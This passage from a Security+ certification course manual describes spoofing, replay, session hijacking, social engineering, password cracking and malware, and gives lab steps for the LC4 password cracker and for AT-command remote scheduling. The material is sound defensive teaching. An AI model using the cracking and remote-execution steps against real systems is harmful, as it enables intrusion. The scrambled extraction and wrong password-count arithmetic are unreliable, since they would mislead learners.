Countermeasures To defend against Web spoofing attacks, do the following: Disable JavaScript, ActiveX, and Java in the browser. The attacker will be unable to hide the evidence of the attack. Display the browsers location line. Instruct users to watch their browsers location line for any dubious URLs. Instruct users to set their homepage to a known secure Web site.

DNS spoofing
DNS spoofing manipulates the DNS server to redirect users to an attackers server. The DNS server resolves Internet domain names (www.security.net) to IP addresses (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS spoofing can alter the cache so that www.security.net, which normally translates to an IP address of 203.123.12.10, is redirected to 186.120.0.40.

Attacks and malicious code DNS spoofing is accomplished in one of three ways:

323

The attacker compromises the victim organizations Web server and changes a hostname-to-IP address mapping. When users request the hostname, they are directed to the hackers server, rather than the authentic one. Using IP spoofing techniques, the attackers DNS server instead of the legitimate DNS server answers lookup requests from users. Again, the hacker can direct user lookups to the server of his or her choice instead of to the authentic server (also called DNS hijacking). When the victim organizations DNS server requests lookups from authoritative servers, the attacker poisons the DNS servers cache of hostname-to-IP address mappings by sending false replies. The organizations DNS server stores the invalid hostname-to-IP address mapping and serves it to clients when they request a resolution. All three attacks can cause serious security problems, such as redirecting clients to wrong Internet sites or routing e-mail to non-authorized mail servers. Countermeasures To prevent DNS spoofing: Ensure that your DNS software is the latest version, with the most recent security patches installed. Enable auditing on all DNS servers. Secure the DNS cache against pollution. Deploy anti-IP address spoofing measures. Do it!

C-2:

Securing the DNS cache against pollution Heres why

Heres how
Tell students the default configuration of Microsoft DNS server allows data from malicious or incorrectly configured servers to be cached in the DNS server. This procedure sets filters in place to protect the cache from DNS spoofing.

1 Click Start Choose Administrative Tools, DNS 2 Right-click the server name Choose Properties 3 Activate the Advanced tab 4 Verify that Secure cache against pollution is checked 5 Click Cancel 6 Close the dnsmgmt window
To filter for bogus cache instructions from unauthorized servers. To open the dnsmgmt window.

In the left window pane.

324
Do it!

CompTIA Security+ Certification

C-3:

Review of spoof attacks

Questions and answers


1 What method is used on LANs to map a hosts IP address with its physical address?
A

ARP MAC DNS SYN

B C D

2 IP address attacks spoof the __________________________ of the trusted host to send its packets to the victim.
source IP address

3 Web spoofing is considered a ___________ attack when the attacker places himself between the victim and the Web server that the victim wants to visit. A B
C

Denial of service SYN Man-in-the-middle DDoS

4 IP address spoofing attacks flood the trusted host with ______________________.


SYN packets

5 When can DNS spoofing be implemented? (Choose all that apply.)


A

The attacker compromises the victims DNS server and changes a hostnameto-IP address mapping The attacker rewrites the URLs embedded in legitimate Web pages to include the attackers Web server The attackers DNS server instead of a legitimate DNS server answers lookup requests from users The attacker rewrites the content of a Web page to make the victim believe some false information

B
C

Attacks and malicious code

325

Topic D: Replays
This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Replay

1.4

Replay attacks
Explanation Replay attacks involve listening to and repeating messages from a legitimate user in order to impersonate the user and gain access to systems. To implement a replay attack, the attacker: 1 Uses a sniffer program or device to read and capture packets passed between two hosts on the network. Sniffers work by placing the machines network interface into promiscuous mode, meaning that it listens to all packet activity on the network. 2 Filters the data and extracts the authentication transaction, typically an encrypted username and password, digital signature or encryption key. 3 Does not attempt to decrypt the transaction, but instead replays the transaction in order to gain access to a secured resource. Actually, replay attacks are more challenging than just recording and replaying information. To perform such an attack, the attacker must accurately guess the TCP sequence numbers. The attacker can accomplish this by using a script or utility that automatically makes guesses until the correct sequence is determined.

Web-based replays
A Web application is vulnerable to a replay attack if a users authentication tokens (nonencrypted session identifier in URL, unsecured cookie, and so on) are captured or intercepted by an attacker. By simply sniffing an HTTP request of an active session or capturing a desktop users cookie files, a replay attack can be very easily performed. For example, by sniffing a URL that contains the session ID string, an attacker might be able to obtain or create service to that users account simply by pasting this URL back into his Web browser. The legitimate user might not need to be logged on to the application at the time of the replay attack.

Other replays
Biometric devices are also vulnerable to replay attacks. In Might of 2002, a Japanese researcher presented a study showing that biometric fingerprint readers can be fooled 80 percent of the time by a fake finger created with gelatin using fingerprints lifted from a drinking glass.

326

CompTIA Security+ Certification Countermeasures Secure authentication systems have an anti-replay feature that makes each packet unique. This ensures that even if authentication data is captured by an attacker, it cannot be retransmitted in order to gain access to systems. Web applications continue to be vulnerable to replay attacks. This is because assailants can gain access to user credentials via session IDs that are part of URLs stored in proxy server logs. To prevent this type of attack: Update software with the latest security patches For Web-based transactions, use SSL to encrypt sensitive data

Do it!

D-1:

Discussing replays

Questions and answers


1 Describe the process to perform a replay attack.
1 The hacker uses a sniffer to capture packets passed between two hosts on the network. 2 The hacker extracts the username and password, digital signature, or encryption key. 3 The hacker replays the transaction to gain access to a secured resource.

2 A Web application is vulnerable to a replay attack if a users _______________ are captured or intercepted by an attacker.
authentication tokens

3 How can an administrator protect against replays?


Update software with the latest security patches and, for Web-based transactions, use SSL to encrypt sensitive data.

Attacks and malicious code

327

Topic E: TCP session hijacking


This topic covers the following CompTIA Security+ exam objective:
# 1.4 Objective Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk TCP/IP Hijacking

How TCP session hijacking works


Explanation To accomplish TCP session hijacking, an attacker uses techniques such as ARP cache poisoning to make the victim believe that they connected to a trusted host, when in fact the victim is communicating with the attacker. A well-known tool for this purpose is Hunt, a free Linux tool that can monitor traffic on an Ethernet segment. With this tool, an attacker can then hijack TCP sessions by poisoning the victims ARP cache. To launch a TCP hijacking, the attacker is on the same Ethernet segment as the victim. The attacker runs Hunt (which acts as a sniffer by placing the attackers NIC in promiscuous mode) and waits for the victim to log on to the target server with his or her username and password. This way, the attacker can gain someone elses username and password and deceive normal authentication systems. When Hunt sees that the TCP connection has been established, it displays the connection to the attackers console and sniffs the victims keystrokes as they are transmitted to the target host. The attacker can take over the session by choosing the arp/simple attack option from within Hunt. In this case, Hunt sends three ARP packets, which cause the victims IP address to be bound to the attackers MAC address. Now, any packets destined for the victims IP address are sent to the attackers NIC. Hunt verifies the binding worked by sending a ping packet to the target host. If the target sends its response to the attackers MAC address, then the attack is effective. Now the attacker can type commands and use the victims TCP connection at will. The attack has the same effect as if the victim logged on to a server using telnet, and walked away from the terminal, thereby allowing the attacker to sit down and take control of the session. When the attackers are done using the TCP session, they have the option of terminating it or resynchronizing with the victims MAC address. Countermeasures Use IPSec to encrypt and secure communications.

328
Do it!

CompTIA Security+ Certification

E-1:

Reviewing attacks

Questions and answers


Match the following attacks with their definitions: ARP poisoning DNS spoofing IP address spoofing Ping of Death TCP session hijacking DDoS DoS Man-in-the-Middle Replay MAC attack
Man-in-the-middle

1 Attacker intercepts communications between two computers with intent of retransmitting capture data. 2 Attacker intercepts communications between two computers and acts as relay to access confidential data. 3 Attacker takes over the victims IP address by corrupting the ARP caches of directly connected machines. 4 Attacker consumes network bandwidth and computer resources to disable system. 5 Attacker sends very large ICMP packets that are too large for receivers buffer when reassembled. 6 Attacker creates an IP address with a forged source address. 7 Attacker intercepts a query to a DNS server and replies with bogus information. 8 Attacker uses hundreds or thousands of hosts on Internet to flood a victim with requests or deprive it of its resources. 9 Attacker hijacks TCP session to access network resources using identity of trusted host.

Replay

ARP poisoning

DoS

Ping of Death

IP address spoofing

DNS spoofing

DDoS

TCP session hijacking

Attacks and malicious code

329

Topic F: Social engineering


This topic covers the following CompTIA Security+ exam objectives:
# 1.4 Objective Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Social Engineering 5.1 Understand the application of the following concepts of physical security Social Engineering

Real world threats


Explanation Social engineering is the equivalent of hacking vulnerabilities in computer systems to gain accessexcept it occurs in the world of people. Social engineering exploits trust in the real world between people to gain information that attackers can then use to gain access to computer systems. These trust exploits usually, though not always, involve a verbal trick or a believable lie. Goals of social engineering techniques include fraud, network intrusion, industrial espionage, identity theft, or a desire to disrupt a system or network. Targets for social engineering techniques tend to be larger organizations where it is common for employees who have never actually met to have communications and those that have information desired by attackers: industrial/military secrets, personal information about targeted individuals, and resources such as long-distance or network access. Social engineering techniques are often used when the attacker cannot find a way to penetrate the victims systems using other means. For example, when a strong perimeter security and encryption foil an attackers efforts to penetrate the network, social engineering might be the only avenue left. A slip of words is all the attacker needs to gain access to your well-defended systems.

330

CompTIA Security+ Certification

Dumpster diving
Digging useful information out of an organizations trash bin is another form of attack, one that makes use of the implicit trust that people have that once something is in the trash, its gone forever. Experience shows that this is a very bad assumption, as dumpster diving is an incredible source of information for those who need to penetrate an organization in order to learn its secrets. The following table lists the useful information that can be obtained from trash bins:
Item Internal phone directories Description Provide names and numbers of people to target and impersonatemany usernames are based on legal names. Provide information about people who are in positions of authority within the organization. Indicate how secure (or insecure) the company really is. Identify which employees are out of town at a particular time. Provide all sorts of useful information; for example, hard drives might be restored. Include the exact information that attackers might seek, including the IP addresses of key assets, network topologies, locations of firewalls and intrusion detection systems, operating systems, applications in use, and more.

Organizational charts

Policy manuals Calendars Outdated hardware

System manuals, network diagrams, and other sources of technical information

Online attacks
Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the Trojan attacks, attackers might try to induce their victims to execute a piece of code by convincing them that they need it (You have an IRC virus, and you have to run this program to remove itotherwise youll be banned from this group) or that its interesting (a game, for example). Most users are more aware of hackers when they are online, and are careful about divulging information in chat sessions and e-mail. If a hacker can manage to get a small program installed on a users machine, he might be able to trick the user into reentering a username and password into a pop-up window. Social engineering countermeasures There are a number of steps that organizations can take to protect themselves against social-engineering attacks. At the heart of all of these countermeasures is a solid organizational policy that dictates expected behaviors and communicates security needs to every person in the company. 1 Take proper care of trash and other discarded items. For all types of sensitive information on paper, use a paper shredder or locked recycle box instead of a trash can. Ensure that all magnetic media is bulk erased before it is discarded. Keep trash dumpsters in secured areas so that no one has access to their contents.

Attacks and malicious code 2 Ensure that all system users have periodic training about network security.

331

Make employees aware of social engineering scams and how they work. Inform users about your organizations password policy (for example, never give your password out to anybody at all, by any means at all). Give recognition to people who have avoided making mistakes or caught real mistakes in a situation that might have been a social-engineering attack. Ensure people know what to do in the event they spot a social-engineering attack. Do it!

F-1:

Discussing social engineering

Questions and answers


1 Which of the following are the best ways to protect your organization from revealing sensitive information to dumpster divers?
A

Use a paper shredder or locked recycle box Teach employees to construct strong passwords Add a firewall Keep trash dumpsters in secured areas

B C
D

2 How can you secure system users from social attacks?


Answers might include:

Make employees aware of social engineering scams and how they work Inform users about your organizations password policy Give recognition to people who have avoided making mistakes or caught real mistakes in
a situation that might have been a social-engineering attack

Ensure people know what to do in the event they spot a social-engineering attack

332

CompTIA Security+ Certification

Topic G: Attacks against encrypted data


This topic covers the following CompTIA Security+ exam objective:
# 1.4 Objective Understand the concept and significance of auditing, logging and system scanning Weak Keys Mathematical Birthday Password Guessing Brute Force Dictionary

Encryption
Explanation Encryption is a method used to encode a plaintext file so only the intended recipient might read the original contents. This is usually accomplished using a complex algorithm and a key; the two are used to encode the original, readable version into an encrypted file and then decode the encrypted file back into its original form.

Weak keys
Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability might be due to weak algorithms or keys that are too simple. For example, as computer processing capabilities increased, encryption keys have grown in size and complexity from 40 and 56 bits to 128 and even 256 bits. Hackers will continue to try to break encryption standards. The best practice is to use the strongest encryption standards and algorithms available, along with strong keys.

Mathematical attacks
A mathematical attack on a cryptographic algorithm uses the mathematical properties of the algorithm to decrypt data or discover its secret keys. This is done by using computations, which is a much faster method than guessing. The process of creating mathematical attacks on cryptographic systems is called cryptanalysis, which is traditionally broken into three categories, depending on the type of information available to the analyst. The categories are listed in order of increasing advantage to the analyst. Strong algorithms are expected to be able to withstand even chosen plaintext attacks. Cyphertext-only analysis The analyst has only the encrypted form of the data and no information about its cleartext (pre-encrypted) content. Known plaintext attack The analyst has available some number of messages in both unencrypted and encrypted form. Chosen plaintext attack The analyst has the ability to cause any message they wish to be encrypted.

Attacks and malicious code

333

Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the mathematical weaknesses of hash algorithms and one-way hash functions. It gets its name from the surprising fact that the probability that two or more people in a group of 23 share the same birthday is greater than fifty percent. You would need about 183 people in the same room to get a 50-50 chance a person shares the same birthday as you. The difference is that in the first case, two people share any of 365 possible birthdays. In the second case, youre looking for two people that share a single predefined birthday. This effect is called a birthday paradox. The birthday attack is one of the most significant attacks against the integrity of digital signature schemes. Heres the theory behind the birthday attack: Take some function (for example, a hash function) and supply it with a random input repeatedly. If the function returns one of k equally likely values, then by repeatedly evaluating the function for different inputs, statistically we expect to obtain the same output after about 1.2*k1/2 inputs. For the birthday paradox, replace k with 365. Birthday attacks are often used to find collisions (two inputs that result in the same hash value) of hash functions and are useful because they reveal mathematical weaknesses that can be used to compromise the hash. This is a much, much faster approach (compare 183 to 23 in the earlier birthday example) compared to the brute force technique of trying every possible combination.

Password guessing
Password guessing is another attack that seeks to circumvent normal authentication systems by guessing the victims password. This can actually be a trivial operation in some cases. For example, Microsoft Windows operating system stores username and password information in a SAM file located in the system directory. If attackers can gain access to the SAM file, they can immediately determine the user accounts (logon IDs) configured on the machine in question, and can then use brute force or dictionary password guessing tools on it to determine the users passwords. This can take some time if the user has selected a strong password, but can take substantially less time if the user has selected a common English word that can be determined by using a dictionary attack. One well-known commercial tool for assessing user passwords is called L0phtCrack after the hacker group named L0pht. (L0pht is now part of the security firm @stake.) This tool has a number of features, including the ability to conduct the brute force and dictionary attacks on Windows passwords outlined below.

334

CompTIA Security+ Certification Brute force The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password, and passes each possible combination one by one through the password hash function in order to crack the victims password. For example, a hacker attempting to crack a five-letter password of all uppercase letters might try AAAAA, BAAAA, CAAAA, and so on until the victims password is discovered. The brute force approach is effective compared to the dictionary attack, because it can crack any password, regardless of whether or not it is an English word that could be vulnerable to the dictionary attack. A brute force attack is computationally very intensive, and can therefore take some time to complete. For example, an 8-character password that uses only uppercase letters would require 826 or 302,231,454,903,657,293,676,544 possible combinations. If the password could use lowercase and numeric characters as well as uppercase ones, then the number of possible combinations jumps up to 8(26+26+10) or 862 combinations, which is a much higher number and would therefore take much longer to run through all possible combinations. Of course, the attackers could get lucky. If they stumble across the victims password early on, the time required to crack the password could be dramatically shorter, as would be the case if the victims password is BAAAA. Dictionary The dictionary approach to password cracking uses a predetermined list of words, typically normal English words and some variations, as input to the password hash. A dictionary password-cracking tool resolves the hash for each word in its list and then compares the hash against the users password hash, one by one. When the two match, then the password has been cracked. The dictionary attack only works against poorly chosen passwords. For this reason, its important that organizations put in place a policy that dictates users choose strong passwords that are not susceptible to this type of attack. Strong passwords are generally at least eight characters and use a mixture of uppercase, lowercase, numeric, and special characters. It is unlikely that an attackers word list includes this type of password, although poorly chosen passwords that meet the above criteria might still be in a hackers word list. The word p@55w0rd (password, spelled using the well-known hacker style) would be a bad choice for a password because it might be included in an attackers word list.

Attacks and malicious code Do it!

335

G-1:

Decrypting encrypted passwords Heres why


(Follow Instructors directions.) LC4 is the premier password-cracking tool. The download for LC4 is provided at net-security.org/software.php?id=17.

Heres how
See the classroom setup instructions for location of the download file.

1 Download the LC4 software to


C:\Security

2 Install the program 3 Click Start and choose All Programs, LC4, LC4 4 Click Trial Click Next 5 In the Get Encrypted Passwords window, verify that Retrieve from the local machine is selected Click Next 6 In the Choose Auditing Method window, select Strong
Password Audit

(Follow the Instructors directions.) To open the LC4 Trial Version window.

To open the LC4 Wizard. To choose the program settings.

LC4 has the capability of doing a brute force attack on passwords, which will find all passwords given enough time. The trial version, however, does not do the brute force attack, so it finds only the most vulnerable passwords.

Click Next 7 In the Pick Reporting Style window, select all options Click Next Click Finish 8 Close the LC4 program window
To begin auditing. LC4 will successfully decode the simpler passwords on your system.

336
Do it!

CompTIA Security+ Certification

G-2:

Discussing attacks against encrypted data

Questions and answers


1 Weak keys are secret keys used in encryption that exhibit a poor level of encryption. True or false?
True

2 The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password. True or false?
True

3 What type of attack will use properties of the cryptographic algorithm to discover its secret keys? A
B

Birthday attack Mathematical attack Password guessing All of the above

C D

4 How does the dictionary attack succeed in cracking a password?


It resolves the hash for each word in its list of English words, and then compares the hash against the users password hash. When the two match, the password is cracked.

Attacks and malicious code

337

Topic H: Software exploitation


This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Back Door Software Exploitation 1.5 Recognize the following types of malicious code and specify the appropriate actions to take to mitigate vulnerability and risk Viruses Trojan Horses Logic Bombs Worms 2.5 Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities 8.3 Naming Conventions

1.4

Vulnerabilities in software
Explanation The term exploit is often used to mean any type of attack on a computer system, but software exploitation in the true sense means a penetration of security through vulnerabilities in software. This term casts a wide net, but generally applies to all tools and tricks that take advantage of vulnerabilities in software, whether logic errors or buffer overflows. The majority of successful attacks which use software exploits take advantage of wellknown vulnerabilities, such as ones that are publicly known, and ones for which patches and fixes are readily available from their vendors, usually by download over the Internet. An excellent example of this is the wave of worms that exploited Microsofts IIS Server in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to successfully use, vulnerabilities that have received national press and for which fixes have been available for some time now. These worms have severely impacted the Internet by congesting links with attack traffic and crashing Internet routers, and the worms have severely impacted the businesses that have been hit by them. This points to a continued pattern of indifference to security issues on the part of system administrators, according to a study by Gartner Research in Might of 2002.

Ask students how wellknown vulnerabilities remain a problem if a fix is developed.

338

CompTIA Security+ Certification As software is tested by industry experts to assess its level of security and vulnerabilities are identified, the vendor is notified and given time to address the issue before the public is made aware. In this way, users of the product are given an opportunity to protect their systems with vendor-provided fixes and patches before attack tools are generated that can be operated by those with script kiddie-level skills.

Buffer overflows
Buffer overflows is a very common type of vulnerability and are frequently exploited on the Internet to gain access to systems. This type of attack works in the following manner. Whenever software accepts any type of data from a user or another application, it allocates memory for that data. If the data that is passed to the software is too large to fit into the allocated memory (the buffer), the data could overwrite areas of memory reserved for other processes, including the stack. What results is a buffer overflow, which can have a variety of consequences including application crashes, operating system crashes, or no effect at allor it could result in a situation in which the attacker can cause his own code to be executed on the system. In this case, the attackers buffer overflow could give the attacker access to the system. Countermeasures The key to stopping software exploits against your critical systems is to stay apprised of the latest security patches provided by your software vendors. Most vendors provide mailing lists for this purpose, so customers can be immediately aware of security issues associated with their products, as well as the fixes for those problems. Most security patches are readily available free of charge. Microsoft provides a number of free tools and services to Windows users in order for users of their products to stay abreast of the frequent security updates for their product. Perhaps the most accessible method, found at windowsupdate.microsoft.com, is an automated tool that can examine a Windows machine and identify the latest security and product updates needed for that particular machine. Other tools include the Microsoft Baseline Security Analyzer (MBSA) that identifies critical patches that have not been installed on Windows servers. For more information, go to www.microsoft.com/security.

Malicious software
Malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. The primary difference between the various types of malware is their means of spreading. The following table outlines the primary differences between worms, viruses, and Trojan horses; more precise explanations are given in each of the following sections:

Attacks and malicious code


Type Virus Worm Trojan horse Propagation Copies itself into other executable programs and scripts. Exploits vulnerabilities with the intent of propagating itself. Uses social engineering techniques to trick users into running the malwares executable. Examples Melissa Code Red

339

ILOVEYOU, Naked Wife, Anna Kournikova

Viruses
Viruses are self-replicating programs that spread by infecting other programs. Viruses copy themselves into other programs and change them (or their environments) so that, when the infected program is run, the virus is also executed and has the opportunity to spread the infection to other programs. The host program or executable can be any binary file, script, or code that has the opportunity to modify other programs. A virus can infect an executable binary, a Visual Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet Relay Chat) clients such as Pirch or mIRC. Its important to remember that programs do not have to actually modify an executable itself to be categorized as viruses. Self-replicating programs that modify the behavior of the host program or its environment are also clearly viruses. For example, a virus might cause an e-mail client to mail a copy of the virus to every user in the clients address book without actually modifying the e-mail clients code. Types of viruses The number, variety, and frequency of new viruses are astounding. A visit to one of the many online virus databases reveals new viruses being discovered on a daily basis. The following table provides just a sampling of virus databases:
Product Network Associates (McAfee) Symantec Computer Associates Trend Micro URL http://vil.nai.com/VIL/default.asp http://securityresponse.symantec.com/avcenter/vinfodb.html www3.ca.com/virus/encyclopedia.asp www.antivirus.com/vinfo/virusencyclo/

340

CompTIA Security+ Certification The viruses can be categorized according to type. The following table lists the predominant virus types:
Type Boot sector Description Spread by infecting floppy or hard disk boot sectors; when an infected disk is booted, the virus is loaded into memory and attempts to infect the hard disk and all floppy disks inserted into the computer. A class called parasitic viruses because they must infect other programs; file infectors copy themselves into other programs. When an infected file is executed, the virus is loaded into memory and tries to infect other executables. File types commonly infected include: *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com. Propagated by using both boot sector and file infector methods. Currently accounting for the vast majority of viruses, macro viruses are application specific as opposed to OS specific and propagate very rapidly via e-mail. Many macro viruses are Visual Basic scripts that exploit commonly used Microsoft applications such as Word, Excel, and Outlook. Instead of modifying an existing program, the companion virus uses the DOS 8.3 naming system to disguise itself as a program with the same name but different extension. For example, a virus might name itself solitaire.com to emulate the solitaire.exe program. The .com file executes before an .exe file of the same name. The virus then runs the real program so it appears as if everything is normal. Changes or mutates as it copies itself to other files or programs. The goal is to make it difficult to detect and remove the virus. Similar to polymorphic, but recompiles itself into a new form, so the code keeps changing from generation to generation.

File infector

Multipartite Macro viruses

Companion

Polymorphic Metamorphic

Propagation techniques Antivirus software and online scanning services have become more commonplace, so viruses must spread quickly if they are to spread at all. To accomplish this, viruses combine mass mailing techniques (sending copies of itself to all recipients in the infected hosts address book) with file infectors and worm techniques. Mass mailing techniques allow each instance of the virus to infect potentially hundreds of hosts. The following table outlines some of the methods that virus writers are using to spread their viruses:

Attacks and malicious code


Item SKA Melissa Babylonia LoveLetter MTX Nimda Sobig Jitux.A Info January 1999 March 1999 December 1999 Might 2000 August 2000 September 2001 January 2003 December 2003 Description Single mailer. Mass mailer targeting 50 recipients in a single activation. Mass mailer using plug-in techniques.

341

Mass mailer targeting all recipients in the victims address book, in multiple activations. Mass mailer incorporating file infector, sharing network, and backdoor features. Mass mailer, also incorporating file infector, sharing network, backdoor process, and IIS infector methods. Spread through built-in SMTP client and local Windows network shares Spread through MSN Messenger

The major trend in viruses is that virus writers are adapting to more fully exploit the Internets functionality. Boot sector viruses, previously the most prevalent virus type, have been supplanted by worms and macro viruses that take advantage of the increasingly interconnected computing environments. Instead of slowly infecting machines as floppy disks are swapped and shared, viruses can now spread virulently enough to have a global impact in a matter of days or weeks via the Internet. Costs Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have these qualities have extremely negative consequences. This is because viruses typically have consequences unintended by the virus writer. For obvious reasons, virus writers do not perform compatibility testing. When the virus spreads into systems with differing software packages or OS flavors, it can have unforeseen impacts which can range from slow system response times to causing the infected system to crash. When a virus becomes widespread, it causes very large productivity losses in businesses around the world as computer users struggle with their infected machines. Widespread infections can also result in what is effectively a denial-of-service (DoS) attack on mail servers, which can be brought to a grinding halt as they are swamped with a huge volume of virus-generated messages. Additional costs are incurred as system administrators have to spend time battling the infection and removing it from computers. Virus removal can often be a difficult and time-consuming process. The cleanup process itself can inadvertently cause additional damage to the computer system because administrators often have to replace important system files that are infected by the virus. Businesses can incur a significant cost in terms of goodwill and reputation if they are infected with a virus.

342

CompTIA Security+ Certification Countermeasures A number of vendors provide enterprise virus protection solutions that can effectively filter known viruses, Trojan horses, and worms. These solutions include desktop antivirus programs, virus filters for e-mail servers, and network appliances that detect and remove viruses. Best practices dictate that large organizations need a multi-layered security approach that defends against malware from all points of entry to the network. This means that no single solution is enough: virus solutions at network gateways, desktops, and on e-mail servers (both internally and on network Demilitarized Zones) are needed to best protect the enterprises productivity and information assets.
Item Description Install products from multiple vendors. Some suppliers offer a fix for a given new virus before others, so by using multiple products, your organization can have the fix for new viruses sooner. Keep virus signature databases up to date on both desktop computers and servers. Use automated systems to automatically download and install the latest signatures. Policies and procedures Software updates and patches User education Define an organizational policy that clearly states proper use of e-mail and network resources, and ensures that computer users receive training on safe computing habits. Keep machines, and especially servers, up to date with security patches to ensure their systems are not vulnerable to well-known exploits. Instruct users to never download any file from an unknown source. If a program is double-clicked even once, even for a moment to check it out, the computer can be infected. Caution users about executable files sent to them even from friends and co-workers. In general, there is little need to send executables via e-mail. Users should always check with the source before running the executable. Configure servers Many e-mail servers can automatically disable forwarding of dangerous file types by e-mail to prevent the spread of viruses and other malware.

Stress the importance of virus database update subscriptions so new software does not have to be purchased when an outbreak occurs.

Antivirus products

Trojan horses
According to legend, the ancient Greeks tricked the Trojans into admitting the Greek army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled the horse behind the citys fortifications, the Greek soldiers who were stowed away inside were able to gain access and conquer the city of Troy. Likewise, the makers of Trojan horse programs gain access to their victims computers by tricking them into running their malware by presenting the program as something useful or beneficial. The candy used to induce users to run the Trojan horse can include anything someone might find interesting: games, pictures, MP3s, screen savers, or pornography (one famous Trojan was entitled Naked Wife). When the unwitting user runs the program, it can wreak havoc with any number of methods including:

Attacks and malicious code Sending copies of itself to all recipients in the users address book Deleting or modifying files Installing backdoor/remote control programs

343

Most Trojan horses install themselves silently; users often dont realize theyve been infected until they receive an e-mail from someone saying an e-mail they have received from the user was infected with a Trojan. In the meantime, the attacker might have already collected password files or uploaded additional tools to use the victims computers for DDoS attacks. Propagation techniques Many viruses are categorized as Trojan horses because they use some sort of social engineering to induce the victim into running the attackers program. Most modern email clients do not allow programs contained in e-mail messages to execute automatically, viruses that spread by e-mail cannot multiply without user intervention. One feature of the Windows operating system that can be used to trick users into running Trojan horses is the Hide file extensions of known file types option. By default, Microsoft Windows hides file extensions, which can cause files to appear to be a different file type than they actually are. If file name extensions are hidden, then the file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing Trojan horses. Countermeasures Implement a clear organizational policy regarding e-mail attachments and train users regarding the policy. Install antivirus programs on each client and maintain current signature files. Do it!

H-1:

Discussing viruses and Trojan horses

Questions and answers


1 Describe a macro virus.
These Visual Basic scripts exploit Microsoft applications.

2 What is a polymorphic virus? A


B

A virus that recompiles itself into a new form from generation to generation. A virus that changes itself as it copies to other files or programs. A virus that spreads by infecting the hard boot sector or floppy disks. A virus that presents itself as a useful or beneficial program in order to trick the user into executing it.

C D

3 Describe how a Trojan horse is propagated.


It usually is attached to an e-mail message. Once run, it can use the users address book to send copies of itself to other marks.

344

CompTIA Security+ Certification

Backdoor
Explanation A backdoor is a piece of malicious software, or malware, that allows a malevolent user to gain remote access without the knowledge or permission of its owner. Also known as remote access Trojans, these programs allow an attacker to connect to the compromised computer locally or over the Internet and, depending on the type of backdoor installed, issue a wide variety of commands. Although some machines compromised with backdoor programs are used to store files and applications such as hacks and exploits for later use, they can also be used as handlers in a distributed denial-of-service attack. Trojan.VirtualRoot Backdoor programs can be installed on victim machines by any number of methods: Trojans or other social engineering methods, worms, viruses, or manually by exploiting vulnerabilities and uploading the remote control software. One recent threat using a backdoor is the Code Red II worm, which exploits vulnerability in Microsoft IIS servers to gain entry, install remote access software called Trojan.VirtualRoot, and continue to spread to other machines. This type of attack is typical of the recent trend of blended threats. Once the Trojan.VirtualRoot backdoor has been installed, the server might be controlled remotely. Back Orifice 2000 One of the more famous remote access control/backdoor programs is Back Orifice 2000 (BO2K), mockingly named after Microsofts Back Office 2000 product suite. Produced by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is offered as a remote administration tool, although its lightweight and unobtrusive nature allow it to be surreptitiously installed on a victims computer without his or her knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8, and installed on the compromised system, it immediately buries itself into the Windows system directory and runs itself silently every time the computer is rebooted.

Exhibit 3-8: BO 2K configuration screen

Attacks and malicious code

345

A remote attacker can then connect to the compromised machine by using the BO2K client GUI and issue any number of commands. Plug-ins are available for BO2K that allow the hacker to view the compromised computers desktop and move the mouse pointer. It is even possible for the remote attacker to activate the victims video camera and microphone, thereby monitoring everything, and everyone, in front of the computer. BO2K runs on most Windows systems and is currently being used on other operating systems. For more information about the tool, see the following Web site:
http://sourceforge.net/projects/bo2k/

NetBus NetBus is an earlier remote control/backdoor tool that has similar functionality to that of BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or worm that gives hackers the ability to connect to the compromised machine over the Internet and issue a variety of commands. Some of the commands seem to be included in the feature set more for their ability to impress the unassuming victim than to be useful. A list of NetBus commands is shown in Exhibit 3-9.

Exhibit 3-9: NetBus commands Countermeasures


.

Backdoor and remote access programs such as BO2K and NetBus are easily detected and eliminated by antivirus software and are otherwise thwarted by using the same mechanisms as used against Trojan horses and viruses. For this reason, it is important to implement an effective virus screening solution on all servers and desktop computers, as well as to educate computer users about the danger of e-mailed viruses and Trojan horses. In addition to these regimens, critical e-commerce servers should be equipped with host-based intrusion detection systems to block attacks that result in the installation of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection systems, although some backdoors encrypt their traffic to bypass network IDS signature detection.

346
Do it!

CompTIA Security+ Certification

H-2:

Using the AT command to start system processes Heres why


The Windows operating system allows you to execute a program on a remote system. Using the at command, you can schedule an executable to run on a remote system at a specific time. This is a remote access Trojan and is commonly used to install Trojan horses on a remote system.

Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.

1 On Server-X, log in as Administrator

2 Press c + a + d Click Task Manager Activate the Processes tab 3 On Server-Y, log in as Administrator 4 Open a command prompt window 5 Enter the following command:
net time \\server-x To know the current time for Server-X so you can schedule the execution of a program. To open the Windows Task Manager. To view the current processes. Look for notepad.exe. You should not see it.

The value for <time> should be 3 minutes after the current time for Server-X.

6 Enter the following command:

Where <time> is 3 minutes after the current time.

